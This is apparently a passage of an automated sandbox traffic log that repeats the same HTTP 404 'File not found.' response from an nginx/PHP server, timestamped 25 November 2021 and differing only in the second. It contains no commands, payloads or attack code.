        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
